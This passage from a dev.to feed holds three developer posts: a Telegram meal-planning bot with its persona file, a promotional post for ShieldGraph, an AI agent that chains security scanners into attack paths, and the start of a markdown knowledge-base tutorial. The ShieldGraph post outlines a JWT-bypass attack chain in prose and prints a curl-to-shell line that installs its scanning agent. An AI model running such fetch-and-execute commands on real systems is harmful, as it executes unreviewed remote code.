&lt;p&gt;Built with &lt;a href="https://github.com/openclaw/openclaw" rel="noopener noreferrer"&gt;OpenClaw&lt;/a&gt; + &lt;a href="https://shopsmartai.org" rel="nofollow noopener noreferrer"&gt;ShopSmartAI&lt;/a&gt; for the &lt;a href="https://dev.to/challenges/openclaw-2026" rel="nofollow"&gt;DEV OpenClaw Challenge 2026&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Live at:&lt;/strong&gt; &lt;a href="https://usemealai.com" rel="nofollow noopener noreferrer"&gt;usemealai.com&lt;/a&gt;&lt;/p&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;What it does&lt;/h2&gt;
&lt;/div&gt;
&lt;p&gt;Ask "What's for dinner?" in Telegram and get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Personalized weekly meal plans&lt;/li&gt;
&lt;li&gt;🛒 Grocery lists organized by store section&lt;/li&gt;
&lt;li&gt;🥗 Dietary adaptations (vegetarian, gluten-free, budget, etc.)&lt;/li&gt;
&lt;li&gt;🍳 Quick recipes with ingredients + steps&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Architecture&lt;/h2&gt;
&lt;/div&gt;
&lt;div class="snippet-clipboard-content notranslate position-relative overflow-auto"&gt;&lt;pre class="notranslate"&gt;&lt;code&gt;User → Telegram → OpenClaw Gateway → OpenAI (gpt-4o-mini) → Response
                         ↓
                   Custom SOUL.md
                   (MealAI Concierge persona)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h2 class="heading-element"&gt;Quick Start&lt;/h2&gt;

&lt;/div&gt;
&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;1. Prerequisites&lt;/h3&gt;

&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Docker (or &lt;a href="https://orbstack.dev/" rel="nofollow noopener noreferrer"&gt;OrbStack&lt;/a&gt; on macOS)&lt;/li&gt;
&lt;li&gt;OpenAI API key: &lt;a href="https://platform.openai.com/api-keys" rel="nofollow noopener noreferrer"&gt;https://platform.openai.com/api-keys&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Telegram bot token via &lt;a href="https://t.me/BotFather" rel="nofollow noopener noreferrer"&gt;@BotFather&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="markdown-heading"&gt;
&lt;h3 class="heading-element"&gt;2. Setup&lt;/h3&gt;

&lt;/div&gt;
&lt;div class="highlight highlight-source-shell notranslate position-relative overflow-auto js-code-highlight"&gt;
&lt;pre&gt;&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Clone this repo&lt;/span&gt;
git clone https://github.com/shopsmartai/mealai-concierge.git
&lt;span class="pl-c1"&gt;cd&lt;/span&gt; mealai-concierge
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy example files&lt;/span&gt;
cp .env.example .env
cp openclaw.json.example openclaw-config/openclaw.json

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit .env with your OpenAI key&lt;/span&gt;
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Edit openclaw.json with your Telegram bot token&lt;/span&gt;

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Copy persona files into workspace&lt;/span&gt;
mkdir -p openclaw-workspace
cp SOUL.md IDENTITY.md openclaw-workspace/

&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;…
&lt;/div&gt;
&lt;/div&gt;
  &lt;/div&gt;
  &lt;div class="gh-btn-container"&gt;&lt;a class="gh-btn" href="https://github.com/shopsmartai/mealai-concierge" rel="noopener noreferrer"&gt;View on GitHub&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;


&lt;p&gt;Everything runs locally in Docker. Clone, add your OpenAI + Telegram tokens, &lt;code&gt;docker compose up&lt;/code&gt;, done.&lt;/p&gt;

&lt;h2&gt;
  
  
  How I Built It
&lt;/h2&gt;

&lt;p&gt;The entire integration took less than &lt;strong&gt;30 minutes&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;OpenClaw in Docker&lt;/strong&gt; (via OrbStack on macOS)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pulled the official &lt;code&gt;ghcr.io/openclaw/openclaw:latest&lt;/code&gt; image&lt;/li&gt;
&lt;li&gt;Config volumes for persistent state&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Telegram channel via BotFather&lt;/strong&gt; — one command, paste token into &lt;code&gt;openclaw.json&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Custom persona via &lt;code&gt;SOUL.md&lt;/code&gt;&lt;/strong&gt; (the magic part 🪄)&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;OpenClaw's &lt;code&gt;SOUL.md&lt;/code&gt; is a system-level personality file&lt;/li&gt;
&lt;li&gt;I wrote 50 lines defining MealAI Concierge's tone, expertise, response format, and boundaries&lt;/li&gt;
&lt;li&gt;No training, no fine-tuning — just thoughtful prompt engineering injected at the agent level&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  The SOUL.md excerpt that transforms a generic chatbot into a meal planner:
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
markdown
# SOUL.md — MealAI Concierge

You are MealAI Concierge, a friendly AI meal-planning assistant.

## Personality
- Warm, conversational, concise
- Opinionated about food (no hedging)
- Practical over perfect
- Real people eat real food

## Response Format
- Use bold for meal names
- Sparse emojis (🥗 🍝 🍳)
- Grocery lists grouped by store section
- Always end with a follow-up ("Want the grocery list?")

## Rules
- Never open with "Great question!" — just answer
- Redirect off-topic: "That's outside my kitchen!"
- Mention usemealai.com for full features
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>openclawchallenge</category>
      <category>devchallenge</category>
      <category>ai</category>
      <category>showdev</category>
    </item>
    <item>
      <title>I built an AI that hacks you before real attackers do</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Tue, 14 Apr 2026 16:14:41 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-an-ai-that-hacks-you-before-real-attackers-do-h</link>
      <guid>https://dev.to/rkondoju/i-built-an-ai-that-hacks-you-before-real-attackers-do-h</guid>
      <description>&lt;p&gt;I asked myself: "What if an AI could think like a pentester and autonomously find attack chains across your entire infrastructure?"&lt;/p&gt;

&lt;p&gt;So I built it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Security teams use 5-10 disconnected tools:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Web scanner ($50K+/yr)&lt;/li&gt;
&lt;li&gt;Network scanner ($40K+/yr)&lt;/li&gt;
&lt;li&gt;Code scanner ($30K+/yr)&lt;/li&gt;
&lt;li&gt;A consulting firm for pentesting ($20K per engagement)&lt;/li&gt;
&lt;li&gt;More tools for cloud, databases, compliance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each tool sees one slice. None of them can answer: &lt;strong&gt;"If an attacker gets into my web app, can they reach my customer database?"&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;ShieldGraph&lt;/strong&gt; — a unified security platform with two features I haven't seen anywhere else.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Autonomous AI Red Team
&lt;/h3&gt;

&lt;p&gt;An AI agent that autonomously chains together 30 vulnerability scanners like a real hacker.&lt;/p&gt;

&lt;p&gt;Here's what actually happens:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Step 1:&lt;/strong&gt; AI runs port scanner - finds ports 80, 443, 5432, 6379&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 2:&lt;/strong&gt; AI reasons: "Port 5432 is PostgreSQL. Let me check the web app first"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 3:&lt;/strong&gt; AI runs web header scanner - finds missing HSTS, no CSP&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 4:&lt;/strong&gt; AI runs API scanner - finds JWT accepting 'alg: none'&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 5:&lt;/strong&gt; AI reasons: "Critical! JWT bypass = forge admin tokens"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 6:&lt;/strong&gt; AI runs directory scanner - finds /admin panel accessible&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 7:&lt;/strong&gt; AI reasons: "Admin panel + JWT bypass = full app compromise"&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 8:&lt;/strong&gt; AI runs database scanner - PostgreSQL accepts trust auth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Step 9:&lt;/strong&gt; AI generates attack chain:&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Web App -&amp;gt; JWT Bypass -&amp;gt; Admin Panel -&amp;gt; PostgreSQL -&amp;gt; Customer PII -&amp;gt; Risk: CRITICAL&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI made 18 autonomous decisions in 3 minutes. A human pentester would take 2-3 weeks for the same work.&lt;/p&gt;

&lt;h3&gt;
  
  
  How the AI Agent Loop Works
&lt;/h3&gt;

&lt;p&gt;The AI picks which scanner to run; we execute it, feed the results back, and the AI decides the next move. It's an agentic loop with safety controls:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Max 50 steps per campaign&lt;/li&gt;
&lt;li&gt;30-minute timeout&lt;/li&gt;
&lt;li&gt;Read-only probing (never exploits)&lt;/li&gt;
&lt;li&gt;Only scans assets you own and verify&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each of our 30 scanners is wrapped as a tool the AI can call. The AI naturally thinks in attack chains: "I found X, so let me check Y" — exactly how a real hacker operates.&lt;/p&gt;
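&lt;p&gt;As a rough sketch (with a stubbed-out decision function standing in for the LLM call, and toy scanner names that are not ShieldGraph's real tool API), the loop looks like this:&lt;/p&gt;

```python
import time

MAX_STEPS = 50             # hard cap per campaign
TIMEOUT_SECONDS = 30 * 60  # 30-minute wall-clock limit

def run_campaign(target, scanners, pick_next_tool):
    """Agentic loop: the model picks a scanner, we execute it,
    feed the results back, and it decides the next move."""
    findings, history = [], []
    deadline = time.monotonic() + TIMEOUT_SECONDS
    for _ in range(MAX_STEPS):
        if time.monotonic() > deadline:
            break
        choice = pick_next_tool(target, history)   # LLM decision point
        if choice is None:                         # model says "done"
            break
        result = scanners[choice](target)          # read-only probe
        history.append((choice, result))
        findings.extend(result)
    return findings

# Toy scanners and a stub policy to show the flow end to end:
scanners = {
    "ports": lambda target: ["5432 open", "6379 open"],
    "web_headers": lambda target: ["missing HSTS"],
}

def pick_next_tool(target, history):
    ran = {name for name, _ in history}
    for name in scanners:
        if name not in ran:
            return name
    return None   # everything has run once; stop

print(run_campaign("example.internal", scanners, pick_next_tool))
```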

&lt;h3&gt;
  
  
  2. Infrastructure Digital Twin
&lt;/h3&gt;

&lt;p&gt;Select any asset, click "Simulate" — see the attack blast radius spread visually through your infrastructure with real probabilities.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Web Server (COMPROMISED)
    |
    +-- 60% -&amp;gt; API Server (1 hop)
    |              |
    |              +-- 30% -&amp;gt; Customer Database with PII (2 hops)
    |
    +-- 15% -&amp;gt; Internal Dashboard (1 hop)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We store the infrastructure as a graph with assets, vulnerabilities, and connections. Then run BFS with probabilistic edge weights based on CVSS scores and EPSS exploit probability data.&lt;/p&gt;
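&lt;p&gt;A minimal sketch of that traversal, with illustrative edge probabilities in place of the real CVSS/EPSS-derived weights:&lt;/p&gt;

```python
from collections import deque

# Asset graph: each edge carries a compromise probability.
# Numbers are illustrative, not derived from real scores.
graph = {
    "web":         [("api", 0.60), ("dashboard", 0.15)],
    "api":         [("customer_db", 0.30)],
    "dashboard":   [],
    "customer_db": [],
}

def blast_radius(start):
    """BFS from a compromised asset, multiplying edge
    probabilities along the first path found to each node."""
    probs = {start: 1.0}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for neighbor, p in graph[node]:
            if neighbor not in probs:
                probs[neighbor] = probs[node] * p
                queue.append(neighbor)
    return probs

# customer_db ends up at 0.60 * 0.30 = 0.18 via the api hop
print(blast_radius("web"))
```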

&lt;p&gt;We also run &lt;strong&gt;Monte Carlo simulations&lt;/strong&gt; (1,000 iterations) to answer real questions:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;API compromised in &lt;strong&gt;100%&lt;/strong&gt; of simulations&lt;/li&gt;
&lt;li&gt;Database compromised in &lt;strong&gt;70.8%&lt;/strong&gt; of simulations&lt;/li&gt;
&lt;li&gt;Average assets reached: &lt;strong&gt;1.71&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;
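&lt;p&gt;The simulation itself is straightforward to sketch: run many independent attack rollouts over the same probabilistic graph and count how often each asset falls. The graph and probabilities below are illustrative, not our production data:&lt;/p&gt;

```python
import random

# Illustrative asset graph with per-edge compromise probabilities.
graph = {
    "web":         [("api", 0.60), ("dashboard", 0.15)],
    "api":         [("customer_db", 0.30)],
    "dashboard":   [],
    "customer_db": [],
}

def simulate_once(start, rng):
    """One rollout: each edge fires independently with its probability."""
    compromised = {start}
    frontier = [start]
    while frontier:
        node = frontier.pop()
        for neighbor, p in graph[node]:
            if neighbor not in compromised and p > rng.random():
                compromised.add(neighbor)
                frontier.append(neighbor)
    return compromised

def monte_carlo(start, iterations=1000, seed=42):
    """Return per-asset compromise rates and mean assets reached."""
    rng = random.Random(seed)
    hits, total_assets = {}, 0
    for _ in range(iterations):
        result = simulate_once(start, rng)
        total_assets += len(result)
        for asset in result:
            hits[asset] = hits.get(asset, 0) + 1
    rates = {a: n / iterations for a, n in hits.items()}
    return rates, total_assets / iterations

rates, avg = monte_carlo("web")
print(rates, avg)
```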

&lt;p&gt;This is what a CISO needs for board reporting — not a list of CVEs, but "there's a 70% chance an attacker reaches our customer database."&lt;/p&gt;

&lt;h2&gt;
  
  
  The Scanner Coverage
&lt;/h2&gt;

&lt;p&gt;Not stubs. Real scanners that connect and check:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;th&gt;What It Scans&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Web&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;XSS, SQLi, CORS, CSP, Headers, SSL, Directory, API Security, Subdomains&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;PostgreSQL, MySQL, MongoDB, Redis, Elasticsearch, Oracle, MSSQL, Cassandra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cloud&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;AWS (IAM/S3/EC2/CloudTrail), Azure (Storage/NSG/SQL), GCP (GCS/Firewall)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;ERP&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;SAP RFC, Oracle EBS, Dynamics 365&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Container&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Docker (privileged mode, root, socket mount, image vulnerabilities)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Network&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Port scan with banner grabbing and service detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Lightweight binary for scanning private networks behind firewalls&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Every finding gets:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CWE classification&lt;/strong&gt; linked to MITRE&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EPSS score&lt;/strong&gt; — real exploit probability from FIRST.org&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI explanation&lt;/strong&gt; in plain English&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Risk score breakdown&lt;/strong&gt; showing exactly why this score&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remediation steps&lt;/strong&gt; with priority ranking&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  The Agent
&lt;/h2&gt;

&lt;p&gt;Deploy a lightweight agent on your private network:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;curl &lt;span class="nt"&gt;-fsSL&lt;/span&gt; https://api.shieldgraph.com/api/v1/agents/install.sh | sh
shieldgraph-agent &lt;span class="nt"&gt;--token&lt;/span&gt; YOUR_TOKEN
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It auto-discovers Docker containers, listening services, and network hosts — then scans everything:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Smart auto-discovery: &lt;strong&gt;20 IPs&lt;/strong&gt; (not 197K)&lt;/li&gt;
&lt;li&gt;Discovered: &lt;strong&gt;11 live hosts&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Open ports: &lt;strong&gt;31&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Findings: &lt;strong&gt;32&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Scan time: &lt;strong&gt;6 seconds&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;No manual configuration. No IP ranges to enter. The agent figures out what's running and scans it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compliance Reports in One Click
&lt;/h2&gt;

&lt;p&gt;Generate PDF reports for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OWASP Top 10&lt;/strong&gt; — map findings to OWASP categories&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PCI DSS 4.0&lt;/strong&gt; — payment card security compliance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SOC 2 Type II&lt;/strong&gt; — service organization controls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;HIPAA&lt;/strong&gt; — healthcare data protection&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each report includes executive summary, detailed findings, remediation roadmap, and compliance mapping.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Learned Building This
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;1. AI tool-use is perfect for security testing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI naturally thinks in attack chains: "I found a missing header, so let me check for injection. I found injection, so let me check what database is behind it." This is exactly how human pentesters think — but the AI does it in minutes, not weeks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Graph databases are essential for attack path analysis&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;SQL can't efficiently answer "can an attacker reach asset Z from asset A through any path?" Graph traversal handles this natively with BFS/DFS.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Probabilistic simulation beats static scoring&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;CVSS alone is useless for decision-making. "This vulnerability has a 7.5 CVSS" means nothing to a CISO. But "there's a 70% chance an attacker reaches your customer database through this vulnerability" — that gets budget approved.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;4. The mid-market is massively underserved&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Enterprise security tools cost $50K-$200K+ per year. 90% of companies can't afford that. We deliver the same capabilities at $499-$2,999/mo. The AI Red Team alone replaces a $20K pentest engagement — and you can run it unlimited.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pricing
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Plan&lt;/th&gt;
&lt;th&gt;Price&lt;/th&gt;
&lt;th&gt;Assets&lt;/th&gt;
&lt;th&gt;Best For&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Starter&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$499/mo&lt;/td&gt;
&lt;td&gt;25&lt;/td&gt;
&lt;td&gt;Small teams&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Professional&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$1,499/mo&lt;/td&gt;
&lt;td&gt;200&lt;/td&gt;
&lt;td&gt;Mid-market&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Enterprise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;$2,999/mo&lt;/td&gt;
&lt;td&gt;Unlimited&lt;/td&gt;
&lt;td&gt;Large organizations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;14-day free trial. No credit card required.&lt;/p&gt;

&lt;h2&gt;
  
  
  Try It
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://shieldgraph.com" rel="noopener noreferrer"&gt;shieldgraph.com&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The AI Red Team alone would cost $20K+ from a consulting firm. We give it to you on-demand, unlimited, for a fraction of the cost.&lt;/p&gt;

&lt;p&gt;We just launched on Product Hunt — I'd love feedback from the dev community. What features would you want to see next?&lt;/p&gt;

&lt;p&gt;Drop a comment below or reach out on &lt;a href="https://twitter.com/shieldgraph" rel="noopener noreferrer"&gt;Twitter @shieldgraph&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ai</category>
      <category>cybersecurity</category>
      <category>security</category>
      <category>webdev</category>
    </item>
    <item>
      <title>I Built a Personal Second Brain with Markdown Files and Claude Code — Here's How</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Wed, 08 Apr 2026 01:17:23 +0000</pubDate>
      <link>https://dev.to/rkondoju/i-built-a-personal-second-brain-with-markdown-files-and-claude-code-heres-how-2m14</link>
      <guid>https://dev.to/rkondoju/i-built-a-personal-second-brain-with-markdown-files-and-claude-code-heres-how-2m14</guid>
      <description>&lt;h2&gt;
  
  
  The Inspiration
&lt;/h2&gt;

&lt;p&gt;I saw &lt;a href="https://x.com/karpathy" rel="noopener noreferrer"&gt;Andrej Karpathy's viral post&lt;/a&gt; about using LLMs to build personal knowledge bases — no vector database, no chunking pipeline. Just markdown files, Obsidian, and Claude Code.&lt;/p&gt;

&lt;p&gt;The core idea blew my mind:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Create a folder with &lt;code&gt;raw/&lt;/code&gt; and &lt;code&gt;wiki/&lt;/code&gt; subfolders&lt;/li&gt;
&lt;li&gt;Drop in source documents, articles, transcripts&lt;/li&gt;
&lt;li&gt;Tell the LLM to ingest the raw files and build wiki pages with relationships, tags, and backlinks&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I immediately thought: &lt;strong&gt;I need to build this, but better.&lt;/strong&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  What I Built
&lt;/h2&gt;

&lt;p&gt;I took Karpathy's concept and extended it into a full-featured &lt;strong&gt;Personal Second Brain&lt;/strong&gt; with several improvements:&lt;/p&gt;

&lt;h3&gt;
  
  
  The Original Concept (Credit: Andrej Karpathy)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Markdown-based wiki with &lt;code&gt;raw/&lt;/code&gt; → &lt;code&gt;wiki/&lt;/code&gt; pipeline&lt;/li&gt;
&lt;li&gt;LLM reads source material and generates structured wiki pages&lt;/li&gt;
&lt;li&gt;Pages link to each other via &lt;code&gt;[[backlinks]]&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Graph view in Obsidian shows connections&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  My Improvements
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;1. Multi-Format Ingestion&lt;/strong&gt;&lt;br&gt;
The original handles text/markdown. I added support for:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;PDF files&lt;/strong&gt; → converted via Marker to markdown before processing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;YouTube transcripts&lt;/strong&gt; → auto-fetched and ingested&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Web articles&lt;/strong&gt; → fetched and cleaned automatically&lt;/li&gt;
&lt;li&gt;Any text-based format&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Smart Duplicate Detection&lt;/strong&gt;&lt;br&gt;
Before creating a new wiki page, the system checks if a similar topic already exists. If so, it &lt;strong&gt;merges&lt;/strong&gt; the new information instead of creating duplicates.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. Auto-Generated Index&lt;/strong&gt;&lt;br&gt;
A master &lt;code&gt;_Index.md&lt;/code&gt; file is automatically maintained with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Categorized links to all wiki pages&lt;/li&gt;
&lt;li&gt;Quick-reference descriptions&lt;/li&gt;
&lt;li&gt;Last-updated timestamps&lt;/li&gt;
&lt;/ul&gt;
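&lt;p&gt;The index builder can be sketched as a small script that groups pages by tag and emits categorized links; the page metadata below is made up for illustration:&lt;/p&gt;

```python
from datetime import date

# Illustrative page metadata; the real pipeline reads this
# from each wiki page's frontmatter.
pages = [
    {"title": "Transformer Architecture", "tags": ["deep-learning"],
     "summary": "Attention-based architecture."},
    {"title": "BERT", "tags": ["deep-learning"],
     "summary": "Encoder-only transformer."},
    {"title": "Spaced Repetition", "tags": ["learning"],
     "summary": "Review scheduling technique."},
]

def build_index(pages, today=None):
    """Render _Index.md: pages grouped by first tag, with summaries."""
    today = today or date.today().isoformat()
    by_tag = {}
    for page in pages:
        by_tag.setdefault(page["tags"][0], []).append(page)
    lines = ["# Index", f"_Last updated: {today}_", ""]
    for tag in sorted(by_tag):
        lines.append(f"## {tag}")
        for page in sorted(by_tag[tag], key=lambda p: p["title"]):
            lines.append(f"- [[{page['title']}]] — {page['summary']}")
        lines.append("")
    return "\n".join(lines)

print(build_index(pages, today="2026-04-07"))
```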

&lt;p&gt;&lt;strong&gt;4. Relationship Mapping&lt;/strong&gt;&lt;br&gt;
Every wiki page includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;related_topics&lt;/code&gt; in frontmatter&lt;/li&gt;
&lt;li&gt;Inline &lt;code&gt;[[backlinks]]&lt;/code&gt; to connected concepts&lt;/li&gt;
&lt;li&gt;Tags for cross-cutting themes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. Source Tracking&lt;/strong&gt;&lt;br&gt;
Each wiki page tracks which raw file(s) it was generated from, so you can always trace back to the original source.&lt;/p&gt;


&lt;h2&gt;
  
  
  Project Structure
&lt;/h2&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;knowledge-base/
├── raw/                    # Drop files here
│   ├── articles/
│   ├── transcripts/
│   ├── notes/
│   └── pdfs/
├── wiki/                   # Auto-generated wiki pages
│   ├── _Index.md           # Master index
│   ├── concept-name.md     # Individual pages
│   └── ...
├── .claude/
│   └── commands/
│       └── ingest.md       # The ingestion prompt
└── CLAUDE.md               # Project instructions
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  How the Ingestion Works
&lt;/h2&gt;

&lt;p&gt;The magic is in the ingestion prompt. When you run it, Claude Code:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Scans&lt;/strong&gt; &lt;code&gt;raw/&lt;/code&gt; for new/modified files&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reads&lt;/strong&gt; each file and extracts key concepts, entities, and relationships&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Checks&lt;/strong&gt; existing wiki pages for overlap&lt;/li&gt;
&lt;li&gt;
